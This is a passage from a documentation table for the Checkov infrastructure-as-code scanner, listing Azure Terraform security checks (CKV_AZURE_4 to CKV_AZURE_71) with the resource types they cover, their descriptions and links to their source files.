[StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsTransportEncryption.py) | +| 1204 | CKV_AZURE_4 | resource | azurerm_kubernetes_cluster | Ensure AKS logging to Azure Monitoring is Configured | Terraform | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLoggingEnabled.py) | +| 1205 | CKV_AZURE_5 | resource | azurerm_kubernetes_cluster | Ensure RBAC is enabled on AKS clusters | Terraform | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py) | +| 1206 | CKV_AZURE_6 | resource | azurerm_kubernetes_cluster | Ensure AKS has an API Server Authorized IP Ranges enabled | Terraform | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSApiServerAuthorizedIpRanges.py) | +| 1207 | CKV_AZURE_7 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Network Policy configured | Terraform | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNetworkPolicy.py) | +| 1208 | CKV_AZURE_8 | resource | azurerm_kubernetes_cluster | Ensure Kubernetes Dashboard is disabled | Terraform | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py) | +| 1209 | CKV_AZURE_9 | resource | azurerm_network_security_group | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | +| 1210 | CKV_AZURE_9 | resource | azurerm_network_security_rule | Ensure that RDP access is restricted from the internet | Terraform | 
[NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | +| 1211 | CKV_AZURE_10 | resource | azurerm_network_security_group | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | +| 1212 | CKV_AZURE_10 | resource | azurerm_network_security_rule | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | +| 1213 | CKV_AZURE_11 | resource | azurerm_mariadb_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1214 | CKV_AZURE_11 | resource | azurerm_mysql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1215 | CKV_AZURE_11 | resource | azurerm_postgresql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1216 | CKV_AZURE_11 | resource | azurerm_sql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1217 | CKV_AZURE_12 | resource | azurerm_network_watcher_flow_log | Ensure that Network 
Security Group Flow Log retention period is 'greater than 90 days' | Terraform | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkWatcherFlowLogPeriod.py) | +| 1218 | CKV_AZURE_13 | resource | azurerm_app_service | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1219 | CKV_AZURE_13 | resource | azurerm_linux_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1220 | CKV_AZURE_13 | resource | azurerm_windows_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1221 | CKV_AZURE_14 | resource | azurerm_app_service | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1222 | CKV_AZURE_14 | resource | azurerm_linux_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1223 | CKV_AZURE_14 | resource | azurerm_windows_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1224 | CKV_AZURE_15 | resource | 
azurerm_app_service | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1225 | CKV_AZURE_15 | resource | azurerm_linux_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1226 | CKV_AZURE_15 | resource | azurerm_windows_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1227 | CKV_AZURE_16 | resource | azurerm_app_service | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1228 | CKV_AZURE_16 | resource | azurerm_linux_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1229 | CKV_AZURE_16 | resource | azurerm_windows_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1230 | CKV_AZURE_17 | resource | azurerm_app_service | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1231 | 
CKV_AZURE_17 | resource | azurerm_linux_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1232 | CKV_AZURE_17 | resource | azurerm_windows_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1233 | CKV_AZURE_18 | resource | azurerm_app_service | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1234 | CKV_AZURE_18 | resource | azurerm_linux_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1235 | CKV_AZURE_18 | resource | azurerm_windows_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1236 | CKV_AZURE_19 | resource | azurerm_security_center_subscription_pricing | Ensure that standard pricing tier is selected | Terraform | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py) | +| 1237 | CKV_AZURE_20 | resource | azurerm_security_center_contact | Ensure that security contact 'Phone number' is set | Terraform | 
[SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py) | +| 1238 | CKV_AZURE_21 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlert.py) | +| 1239 | CKV_AZURE_22 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py) | +| 1240 | CKV_AZURE_23 | resource | azurerm_mssql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1241 | CKV_AZURE_23 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1242 | CKV_AZURE_23 | resource | azurerm_sql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1243 | CKV_AZURE_24 | resource | azurerm_mssql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | 
[SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1244 | CKV_AZURE_24 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1245 | CKV_AZURE_24 | resource | azurerm_sql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1246 | CKV_AZURE_25 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Threat Detection types' is set to 'All' | Terraform | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py) | +| 1247 | CKV_AZURE_26 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Terraform | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py) | +| 1248 | CKV_AZURE_27 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Terraform | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsToAdminsEnabled.py) | +| 1249 | CKV_AZURE_28 | resource | azurerm_mysql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Terraform | 
[MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py) | +| 1250 | CKV_AZURE_29 | resource | azurerm_postgresql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Terraform | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py) | +| 1251 | CKV_AZURE_30 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1252 | CKV_AZURE_31 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py) | +| 1253 | CKV_AZURE_32 | resource | azurerm_postgresql_configuration | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1254 | CKV_AZURE_33 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Terraform | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py) | +| 1255 | CKV_AZURE_34 | resource | azurerm_storage_container | Ensure that 
'Public access level' is set to Private for blob containers | Terraform | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py) | +| 1256 | CKV_AZURE_35 | resource | azurerm_storage_account | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | +| 1257 | CKV_AZURE_35 | resource | azurerm_storage_account_network_rules | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | +| 1258 | CKV_AZURE_36 | resource | azurerm_storage_account | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | +| 1259 | CKV_AZURE_36 | resource | azurerm_storage_account_network_rules | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | +| 1260 | CKV_AZURE_37 | resource | azurerm_monitor_log_profile | Ensure that Activity Log Retention is set 365 days or greater | Terraform | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileRetentionDays.py) | +| 1261 | CKV_AZURE_38 | resource | azurerm_monitor_log_profile | Ensure audit profile 
captures all the activities | Terraform | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileCategories.py) | +| 1262 | CKV_AZURE_39 | resource | azurerm_role_definition | Ensure that no custom subscription owner roles are created | Terraform | [CutsomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CutsomRoleDefinitionSubscriptionOwner.py) | +| 1263 | CKV_AZURE_40 | resource | azurerm_key_vault_key | Ensure that the expiration date is set on all keys | Terraform | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyExpirationDate.py) | +| 1264 | CKV_AZURE_41 | resource | azurerm_key_vault_secret | Ensure that the expiration date is set on all secrets | Terraform | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretExpirationDate.py) | +| 1265 | CKV_AZURE_42 | resource | azurerm_key_vault | Ensure the key vault is recoverable | Terraform | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyvaultRecoveryEnabled.py) | +| 1266 | CKV_AZURE_43 | resource | azurerm_storage_account | Ensure Storage Accounts adhere to the naming rules | Terraform | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountName.py) | +| 1267 | CKV_AZURE_44 | resource | azurerm_storage_account | Ensure Storage Account is using the latest version of TLS encryption | Terraform | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py) | +| 1268 | CKV_AZURE_45 | resource | azurerm_virtual_machine | Ensure that no sensitive credentials are exposed in VM 
custom_data | Terraform | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py) | +| 1269 | CKV_AZURE_47 | resource | azurerm_mariadb_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Terraform | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBSSLEnforcementEnabled.py) | +| 1270 | CKV_AZURE_48 | resource | azurerm_mariadb_server | Ensure 'public network access enabled' is set to 'False' for MariaDB servers | Terraform | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py) | +| 1271 | CKV_AZURE_49 | resource | azurerm_linux_virtual_machine_scale_set | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureScaleSetPassword.py) | +| 1272 | CKV_AZURE_50 | resource | azurerm_linux_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | +| 1273 | CKV_AZURE_50 | resource | azurerm_windows_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | +| 1274 | CKV_AZURE_52 | resource | azurerm_mssql_server | Ensure MSSQL is using the latest version of TLS encryption | Terraform | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py) | +| 1275 | CKV_AZURE_53 | resource | 
azurerm_mysql_server | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Terraform | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py) | +| 1276 | CKV_AZURE_54 | resource | azurerm_mysql_server | Ensure MySQL is using the latest version of TLS encryption | Terraform | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py) | +| 1277 | CKV_AZURE_55 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Servers | Terraform | [AzureDefenderOnServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py) | +| 1278 | CKV_AZURE_56 | resource | azurerm_function_app | Ensure that function apps enables Authentication | Terraform | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py) | +| 1279 | CKV_AZURE_57 | resource | azurerm_app_service | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1280 | CKV_AZURE_57 | resource | azurerm_linux_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1281 | CKV_AZURE_57 | resource | azurerm_windows_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1282 
| CKV_AZURE_58 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces enables managed virtual networks | Terraform | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | +| 1283 | CKV_AZURE_59 | resource | azurerm_storage_account | Ensure that Storage accounts disallow public access | Terraform | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py) | +| 1284 | CKV_AZURE_61 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for App Service | Terraform | [AzureDefenderOnAppServices.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py) | +| 1285 | CKV_AZURE_62 | resource | azurerm_function_app | Ensure function apps are not accessible from all regions | Terraform | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py) | +| 1286 | CKV_AZURE_63 | resource | azurerm_app_service | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1287 | CKV_AZURE_63 | resource | azurerm_linux_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1288 | CKV_AZURE_63 | resource | azurerm_windows_web_app | Ensure that App service enables HTTP logging | Terraform | 
[AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1289 | CKV_AZURE_64 | resource | azurerm_storage_sync | Ensure that Azure File Sync disables public network access | Terraform | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py) | +| 1290 | CKV_AZURE_65 | resource | azurerm_app_service | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1291 | CKV_AZURE_65 | resource | azurerm_linux_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1292 | CKV_AZURE_65 | resource | azurerm_windows_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1293 | CKV_AZURE_66 | resource | azurerm_app_service | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1294 | CKV_AZURE_66 | resource | azurerm_linux_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1295 | CKV_AZURE_66 | resource | 
azurerm_windows_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1296 | CKV_AZURE_67 | resource | azurerm_function_app | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | +| 1297 | CKV_AZURE_67 | resource | azurerm_function_app_slot | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | +| 1298 | CKV_AZURE_68 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server disables public network access | Terraform | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py) | +| 1299 | CKV_AZURE_69 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Azure SQL database servers | Terraform | [AzureDefenderOnSqlServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py) | +| 1300 | CKV_AZURE_70 | resource | azurerm_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1301 | CKV_AZURE_70 | resource | azurerm_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | 
[FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1302 | CKV_AZURE_70 | resource | azurerm_linux_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1303 | CKV_AZURE_70 | resource | azurerm_linux_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1304 | CKV_AZURE_70 | resource | azurerm_windows_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1305 | CKV_AZURE_70 | resource | azurerm_windows_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1306 | CKV_AZURE_71 | resource | azurerm_app_service | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 1307 | CKV_AZURE_71 | resource | azurerm_linux_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 
